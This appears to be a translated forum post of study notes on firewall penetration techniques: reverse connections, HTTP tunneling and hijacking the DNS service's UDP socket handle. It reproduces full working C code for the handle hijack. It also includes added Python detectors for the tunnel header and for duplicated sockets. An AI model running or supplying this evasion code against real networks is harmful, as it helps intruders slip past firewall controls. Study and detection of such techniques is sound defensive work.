On Several Firewall Penetration Techniques, part 2 (Several penetration firewall technologies 2)

2017-11-18 · 20 pages · doc · 46KB · 19 reads

Posted to board: No. 2, Technical Articles
Post title: Several firewall penetration techniques
Post content:

Here are some notes and some ideas about several firewall penetration techniques.

The firewall is one of the basic network security measures: it stops untrusted users on the external network from reaching users on the internal network. If a communication with an internal user is not initiated by that internal user, the firewall usually blocks it, and it is especially sensitive to TCP connections. So, if we want to guarantee normal data transmission, particularly when the connection is not actively initiated from the inside, how do we ensure a safe and stable connection and data communication? People use firewall penetration techniques. The commonly used ones:

1. Reverse connection ------> the connection request is initiated by the internal user, which the firewall rules treat as allowed and safe.
2. HTTP tunneling ------> all the data to be transferred is encapsulated in the HTTP protocol for transmission.
3. Port multiplexing ------> also called port hijacking. The principle is mainly to modify port attributes to achieve port binding; this technique usually has the host transform foreign packets as it accepts them, after which they are accepted by the user's program.
4. Sharing the DNS socket handle ------> this relies mainly on the DNS service being something every firewall has to let through, and on the DNS service (its socket handle) communicating over UDP (illustrated later with some code cited from ZwelL).

Today we focus on combining several of these penetration techniques.

1. Reverse connection combined with HTTP tunneling

A reverse connection is a connection request initiated by an internal network user, which is legal under the firewall rules. Assume there are two programs, S and C:

S ----> proxy ------> C

The server program S initiates the connection request to C from inside the network and obtains the corresponding IP and port through the proxy server:

<----- (IP, port)

It then creates the socket and sets the port number, 8080.

============

Once the C/S connection is established and it is time to transmit data, we use HTTP tunneling: every piece of data to be transmitted is wrapped in the HTTP protocol by prepending an HTTP request header, "Get/HTTP/1.0\r\nUse-Agent:Molliza/1.22\r\nAccept:*/*\r\n\r\n", and a $$ marker is added around the data. The receiving program locates the data segment using the preset marker, strips the HTTP request header, and then processes the data.

Reverse connection + HTTP tunneling also has many limitations:

1. The port number is tied to 80.
2. Data transmission relies on the program encapsulating the data in the HTTP tunnel; the integrity and security of the data inside the tunnel must be fully guaranteed so that it cannot be confused with anything else, and how the data is unpacked also needs some thought.
3. It can be detected by packet capture tools and tools like IDS.
4. The firewall is not a fool, so its rules are not ours to change at will. What we hope for is that the S program does the automatic port mapping for us through a third party, and then there is the stability of our ..........

2. Sharing the DNS socket handle

Everyone should have heard of this technique back in 2005, when ZwelL published an article on it, "A new firewall penetration technique". It takes advantage of the fact that the DNS service communicates over UDP and no firewall can refuse it...... The technique uses the API functions provided by the Windows terminal-services library (wtsapi32).
The procedure is roughly: wtsapi provides a function to enumerate all system processes -----> search for the target process or target service process -----> record the process PID ------> obtain the socket handle through the PID ------> create socket communication on it.

============

Implementation code: the following is cited from ZwelL's article.

/*++
Made By ZwelL
zwell@sohu.com
2005.4.12
--*/
#include <stdio.h>
#include <stdlib.h>
#include <winsock2.h>
#include <wtsapi32.h>
#pragma comment(lib, "ws2_32")
#pragma comment(lib, "wtsapi32")

#define NT_SUCCESS(status) ((NTSTATUS)(status) >= 0)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)

typedef LONG NTSTATUS;

// One entry of the table returned by ZwQuerySystemInformation(SystemHandleInformation = 0x10)
typedef struct _SYSTEM_HANDLE_INFORMATION {
    ULONG       ProcessId;
    UCHAR       ObjectTypeNumber;
    UCHAR       Flags;
    USHORT      Handle;
    PVOID       Object;
    ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;

typedef ULONG (WINAPI *ZWQUERYSYSTEMINFORMATION)(ULONG, PVOID, ULONG, PULONG);
ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation = NULL;

// Resolve ZwQuerySystemInformation from ntdll.dll (it is not exported through a header)
BOOL LocateNtdllEntry(void)
{
    BOOL    ret = FALSE;
    char    NTDLL_DLL[] = "ntdll.dll";
    HMODULE ntdll_dll = NULL;

    if ((ntdll_dll = GetModuleHandle(NTDLL_DLL)) == NULL) {
        printf("GetModuleHandle() failed");
        return FALSE;
    }
    if (!(ZwQuerySystemInformation = (ZWQUERYSYSTEMINFORMATION)
            GetProcAddress(ntdll_dll, "ZwQuerySystemInformation"))) {
        goto LocateNtdllEntry_exit;
    }
    ret = TRUE;

LocateNtdllEntry_exit:
    if (FALSE == ret) {
        printf("GetProcAddress() failed");
    }
    ntdll_dll = NULL;
    return ret;
}

/*++
This routine is used to get a process's user name from its SID
--*/
BOOL GetUserNameFromSid(PSID pUserSid, char *szUserName)
{
    // Sanity checks and default value
    if (pUserSid == NULL) return FALSE;
    strcpy(szUserName, "?");

    SID_NAME_USE snu;
    TCHAR  szUser[_MAX_PATH];
    DWORD  chUser = _MAX_PATH;
    PDWORD pcchUser = &chUser;
    TCHAR  szDomain[_MAX_PATH];
    DWORD  chDomain = _MAX_PATH;
    PDWORD pcchDomain = &chDomain;

    // Retrieve user name and domain name based on the user's SID.
    if (::LookupAccountSid(NULL, pUserSid, szUser, pcchUser, szDomain, pcchDomain, &snu)) {
        wsprintf(szUserName, "%s", szUser);
    } else {
        return FALSE;
    }
    return TRUE;
}

/*++
This routine is used to get the DNS process's ID.
Here I use WTSEnumerateProcesses to get the process user SID, and then the
process user name, because as it is a "NETWORK SERVICE" we can't use
OpenProcessToken to catch the DNS process's token information even if we
have the privilege of catching the system's.
--*/
DWORD GetDnsProcessId()
{
    PWTS_PROCESS_INFO pProcessInfo = NULL;
    DWORD ProcessCount = 0;
    char  szUserName[255];
    DWORD id = -1;

    if (WTSEnumerateProcesses(WTS_CURRENT_SERVER_HANDLE, 0, 1, &pProcessInfo, &ProcessCount)) {
        // Walk each process description
        for (DWORD CurrentProcess = 0; CurrentProcess < ProcessCount; CurrentProcess++) {
            if (strcmp(pProcessInfo[CurrentProcess].pProcessName, "svchost.exe") == 0) {
                GetUserNameFromSid(pProcessInfo[CurrentProcess].pUserSid, szUserName);
                if (strcmp(szUserName, "NETWORK SERVICE") == 0) {
                    id = pProcessInfo[CurrentProcess].ProcessId;
                    break;
                }
            }
        }
        WTSFreeMemory(pProcessInfo);
    }
    return id;
}

/*++
This does not work, as we know... but you can use the routine for other purposes...
--*/
/*
BOOL GetProcessUserFromId(char *szAccountName, DWORD PID)
{
    HANDLE hProcess = NULL, hAccessToken = NULL;
    TCHAR InfoBuffer[1000], szDomainName[200];
    PTOKEN_USER pTokenUser = (PTOKEN_USER)InfoBuffer;
    DWORD dwInfoBufferSize, dwAccountSize = 200, dwDomainSize = 200;
    SID_NAME_USE snu;

    hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, PID);
    if (hProcess == NULL) {
        printf("OpenProcess error");
        CloseHandle(hProcess);
        return FALSE;
    }
    if (0 == OpenProcessToken(hProcess, TOKEN_QUERY, &hAccessToken)) {
        printf("OpenProcessToken error %08x", GetLastError());
        return FALSE;
    }
    GetTokenInformation(hAccessToken, TokenUser, InfoBuffer, 1000, &dwInfoBufferSize);
    LookupAccountSid(NULL, pTokenUser->User.Sid, szAccountName,
                     &dwAccountSize, szDomainName, &dwDomainSize, &snu);
    if (hProcess)
        CloseHandle(hProcess);
    if (hAccessToken)
        CloseHandle(hAccessToken);
    return TRUE;
}
*/

/*++
Now, this is the most important thing... ^_^
--*/
SOCKET GetSocketFromId(DWORD PID)
{
    NTSTATUS status;
    PVOID    buf = NULL;
    ULONG    size = 1;
    ULONG    NumOfHandle = 0;
    ULONG    i;
    PSYSTEM_HANDLE_INFORMATION h_info = NULL;
    HANDLE   sock = NULL;
    DWORD    n;

    buf = malloc(0x1000);
    if (buf == NULL) {
        printf("malloc error\n");
        return NULL;
    }
    // First call with a small buffer to learn the required size
    status = ZwQuerySystemInformation(0x10, buf, 0x1000, &n);
    if (STATUS_INFO_LENGTH_MISMATCH == status) {
        free(buf);
        buf = malloc(n);
        if (buf == NULL) {
            printf("malloc error\n");
            return NULL;
        }
        status = ZwQuerySystemInformation(0x10, buf, n, NULL);
    } else {
        printf("ZwQuerySystemInformation error\n");
        return NULL;
    }
    // The buffer starts with the entry count, followed by the entries
    NumOfHandle = *(ULONG *)buf;
    h_info = (PSYSTEM_HANDLE_INFORMATION)((ULONG)buf + 4);
    for (i = 0; i < NumOfHandle; i++) {
        try {
            if ((h_info[i].ProcessId == PID) && (h_info[i].ObjectTypeNumber == 0x1c)
                && (h_info[i].Handle != 0x2c)) // I don't know why, but if the handle equals 0x2c
                                               // my test stopped at getsockname(),
                                               // so I skip this case...
                                               // it may differ on your system;
                                               // on Win2000 the type is 0x1a
            {
                //printf("Handle: 0x%x Type: %08x\n", h_info[i].Handle, h_info[i].ObjectTypeNumber);
                if (0 == DuplicateHandle(
                            OpenProcess(PROCESS_ALL_ACCESS, TRUE, PID),
                            (HANDLE)h_info[i].Handle,
                            GetCurrentProcess(),
                            &sock,
                            STANDARD_RIGHTS_REQUIRED,
                            TRUE,
                            DUPLICATE_SAME_ACCESS)) {
                    printf("DuplicateHandle error: %8x", GetLastError());
                    continue;
                }
                //printf("DuplicateHandle OK\n");
                sockaddr_in name = {0};
                name.sin_family = AF_INET;
                int namelen = sizeof(sockaddr_in);
                getsockname((SOCKET)sock, (sockaddr *)&name, &namelen);
                //printf("port = %5d\n", ntohs(name.sin_port));
                if (ntohs(name.sin_port) > 0) // if the port is > 0, then we can use it
                    break;
            }
        }
        catch (...) {
            continue;
        }
    }
    if (buf != NULL) {
        free(buf);
    }
    return (SOCKET)sock;
}

/*++
This is not necessary...
--*/
BOOL EnablePrivilege(PCSTR name)
{
    HANDLE hToken;
    BOOL   rv;
    TOKEN_PRIVILEGES priv = {1, {0, 0, SE_PRIVILEGE_ENABLED}};
    LookupPrivilegeValue(0, name, &priv.Privileges[0].Luid);
    priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken);
    AdjustTokenPrivileges(hToken, FALSE, &priv, sizeof priv, 0, 0);
    rv = GetLastError() == ERROR_SUCCESS;
    CloseHandle(hToken);
    return rv;
}

void main()
{
    WSADATA     wsaData;
    char        testbuf[255];
    SOCKET      sock;
    sockaddr_in RecvAddr;
    int iResult = WSAStartup(MAKEWORD(2, 2), &wsaData);
    if (iResult != NO_ERROR)
        printf("Error at WSAStartup()\n");
    if (!LocateNtdllEntry())
        return;
    if (!EnablePrivilege(SE_DEBUG_NAME)) {
        printf("EnablePrivilege error\n");
        return;
    }
    sock = GetSocketFromId(GetDnsProcessId());
    if (sock == NULL) {
        printf("GetSocketFromId error\n");
        return;
    }
    // change the values...
    RecvAddr.sin_family = AF_INET;
    RecvAddr.sin_port = htons(5555);
    RecvAddr.sin_addr.s_addr = inet_addr("127.0.0.1");
    if (SOCKET_ERROR == sendto(sock, "test", 5, 0, (SOCKADDR *)&RecvAddr, sizeof(RecvAddr))) {
        printf("sendto error: %d\n", WSAGetLastError());
    } else {
        printf("Send OK... have fun, right? ^_^\n");
    }
    getchar();
    //WSACleanup();
    return;
}

I had this idea a long time ago, but never got around to implementing it. In the code above, because we have to find the DNS process's handle and there are several svchost.exe, we decide by user name. Originally I used OpenProcessToken, but it would not work no matter what, so I switched to the wtsapi32 library functions instead. Then test with the following code:

/*++
UDPReceiver
--*/
#include <stdio.h>
#include "winsock2.h"
#pragma comment(lib, "ws2_32")

void main()
{
    WSADATA     wsaData;
    SOCKET      RecvSocket;
    sockaddr_in RecvAddr;
    int         Port = 5555;
    char        RecvBuf[1024];
    int         BufLen = 1024;
    sockaddr_in SenderAddr;
    int         SenderAddrSize = sizeof(SenderAddr);

    //-----------------------------------------------
    // Initialize Winsock
    WSAStartup(MAKEWORD(2, 2), &wsaData);

    //-----------------------------------------------
    // Create a receiver socket to receive datagrams
    RecvSocket = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);

    //-----------------------------------------------
    // Bind the socket to any address and the specified port.
    RecvAddr.sin_family = AF_INET;
    RecvAddr.sin_port = htons(Port);
    RecvAddr.sin_addr.s_addr = htonl(INADDR_ANY);
    bind(RecvSocket, (SOCKADDR *)&RecvAddr, sizeof(RecvAddr));

    //-----------------------------------------------
    // Call the recvfrom function to receive datagrams
    // on the bound socket.
    printf("Receiving datagrams...\n");
    while (1) {
        recvfrom(RecvSocket, RecvBuf, BufLen, 0, (SOCKADDR *)&SenderAddr, &SenderAddrSize);
        printf("%s\n", RecvBuf);
    }

    //-----------------------------------------------
    // Close the socket when finished receiving datagrams
    printf("Finished receiving. Closing socket.\n");
    closesocket(RecvSocket);

    //-----------------------------------------------
    // Clean up and exit.
    printf("Exiting.\n");
    WSACleanup();
    return;
}

===========================================================

Test steps:
1. Run UDPReceiver on one machine.
2. Run the first program on the machine that has the firewall installed.
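Section 1 spells out what the tunnelled traffic looks like on the wire: a fixed request header, "Get/HTTP/1.0\r\nUse-Agent:Molliza/1.22\r\nAccept:*/*\r\n\r\n", with the payload wrapped in $$ markers, and the post itself lists detection by IDS-like tools as one of the technique's limitations. The Python below is an added example, not code from the post or from ZwelL: it checks one captured request against the HTTP request-line grammar and a small allow-list of header names, and flags the $$ marker in the body. The sample requests are constructed from the post's header string, and the finding tags and the KNOWN_HEADERS allow-list are this example's own choices.

```python
"""Inspect one captured HTTP request for the tunnel shape described in section 1.

Added example, not part of the original post. Finding names and the header
allow-list are this example's own; tune the allow-list for your environment.
"""
import re

# Request line per RFC 7230: METHOD SP request-target SP HTTP/major.minor
REQUEST_LINE = re.compile(rb"^([A-Z]+) (\S+) HTTP/(\d)\.(\d)$")

# Header names an ordinary browser request carries (assumption: a small
# allow-list; anything outside it is reported, not blocked)
KNOWN_HEADERS = {
    b"host", b"user-agent", b"accept", b"accept-language", b"accept-encoding",
    b"connection", b"content-length", b"content-type", b"cookie", b"referer",
}

# The post wraps the real payload in this marker
TUNNEL_MARKER = b"$$"


def inspect_http_request(raw: bytes) -> list:
    """Return a list of anomaly tags for one request; [] means it looks ordinary.

    A non-empty list is a reason to look closer, not proof of a tunnel.
    """
    findings = []
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        findings.append("no-header-terminator")   # body is then empty
    lines = head.split(b"\r\n")

    # "Get/HTTP/1.0": lower-case method, no spaces, no request-target
    if not REQUEST_LINE.match(lines[0]):
        findings.append("malformed-request-line")

    for line in lines[1:]:
        name, colon, value = line.partition(b":")
        if not colon:
            findings.append("malformed-header-line")
            continue
        lname = name.strip().lower()
        if lname not in KNOWN_HEADERS:
            findings.append("unknown-header:" + lname.decode("latin-1"))
        # "Use-Agent" is one character away from User-Agent, "Molliza" from Mozilla
        if lname == b"use-agent" or (lname == b"user-agent" and b"Molliza" in value):
            findings.append("suspicious-user-agent")

    # HTTP/1.0 clients may omit Host, so this is only a weak signal on its own
    if b"host:" not in head.lower():
        findings.append("missing-host-header")

    if TUNNEL_MARKER in body:
        findings.append("tunnel-marker-in-body")
    return findings


# Constructed samples: the post's header with a marked payload, and a normal request
TUNNELED = (b"Get/HTTP/1.0\r\nUse-Agent:Molliza/1.22\r\nAccept:*/*\r\n\r\n"
            b"$$hello-from-the-inside$$")
NORMAL = (b"GET /index.html HTTP/1.1\r\nHost: example.com\r\n"
          b"User-Agent: Mozilla/5.0\r\nAccept: */*\r\n\r\n")

if __name__ == "__main__":
    for label, req in (("tunneled", TUNNELED), ("normal", NORMAL)):
        print(label, inspect_http_request(req))
```

The checks are deliberately structural (grammar of the request line, known header names, a marker in the body) rather than a signature on the exact string, so a variant with a different fake user-agent still trips the request-line and unknown-header checks.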
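Section 2 works by DuplicateHandle copying a socket handle out of the DNS service's svchost.exe, and that leaves a trace a monitoring agent can look for: the same kernel object (the Object field of the post's SYSTEM_HANDLE_INFORMATION) then appears in two processes' handle tables. The Python below is an added example, not the post's or ZwelL's code: given handle-table records in that shape, it reports socket-type objects that the service process shares with some other process. The records are constructed, the type number 0x1c is the post's value for its test system and is an assumption elsewhere (the post notes Windows 2000 uses 0x1a), and the function names are this example's own.

```python
"""Find socket objects the DNS service process shares with other processes.

Added example, not part of the original post. Input records mirror the
post's SYSTEM_HANDLE_INFORMATION fields; on a live system they would come
from the same SystemHandleInformation query the post's code issues.
"""
from collections import defaultdict
from dataclasses import dataclass

SOCKET_TYPE_NUMBER = 0x1c   # assumption: the post's value; varies by Windows version


@dataclass(frozen=True)
class HandleEntry:
    process_id: int
    object_type_number: int
    handle: int
    object_addr: int         # kernel object pointer; identical for duplicated handles


def shared_socket_objects(entries, service_pid):
    """Map object address -> sorted PIDs for every socket-type object that
    service_pid holds and at least one other process also holds."""
    owners = defaultdict(set)
    for e in entries:
        if e.object_type_number == SOCKET_TYPE_NUMBER:
            owners[e.object_addr].add(e.process_id)
    return {addr: sorted(pids) for addr, pids in owners.items()
            if service_pid in pids and len(pids) > 1}


def suspicious_pids(entries, service_pid, expected_sharers=()):
    """PIDs other than service_pid (and an allow-list of expected sharers)
    that hold a socket object belonging to the service."""
    pids = set()
    for holders in shared_socket_objects(entries, service_pid).values():
        pids.update(p for p in holders
                    if p != service_pid and p not in expected_sharers)
    return sorted(pids)


# Constructed handle table: PID 1234 stands in for the DNS svchost.exe,
# PID 4321 for a process that duplicated one of its socket handles,
# PID 777 for an unrelated process with a socket of its own.
SAMPLE_TABLE = [
    HandleEntry(1234, SOCKET_TYPE_NUMBER, 0x2c, 0xE100A000),
    HandleEntry(1234, SOCKET_TYPE_NUMBER, 0x30, 0xE100B000),
    HandleEntry(1234, 0x05, 0x34, 0xE100D000),                 # non-socket object
    HandleEntry(4321, SOCKET_TYPE_NUMBER, 0x44, 0xE100B000),   # duplicate of handle 0x30
    HandleEntry(4321, SOCKET_TYPE_NUMBER, 0x48, 0xE100C000),   # its own socket
    HandleEntry(777, SOCKET_TYPE_NUMBER, 0x50, 0xE100E000),
]

if __name__ == "__main__":
    for addr, pids in shared_socket_objects(SAMPLE_TABLE, 1234).items():
        print(f"socket object {addr:#x} is held by PIDs {pids}")
    print("suspicious:", suspicious_pids(SAMPLE_TABLE, 1234))
```

Legitimate sharing does exist (inherited handles, WSADuplicateSocket), so the expected_sharers allow-list is the tuning knob; the point is that a duplicated handle cannot hide the shared object pointer from a handle-table audit run with the same system call the technique itself relies on.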
These are my study notes; I hope they are of some help to you. I am currently combining some of the experts' ideas and thinking about a new firewall-penetrating data transmission technique.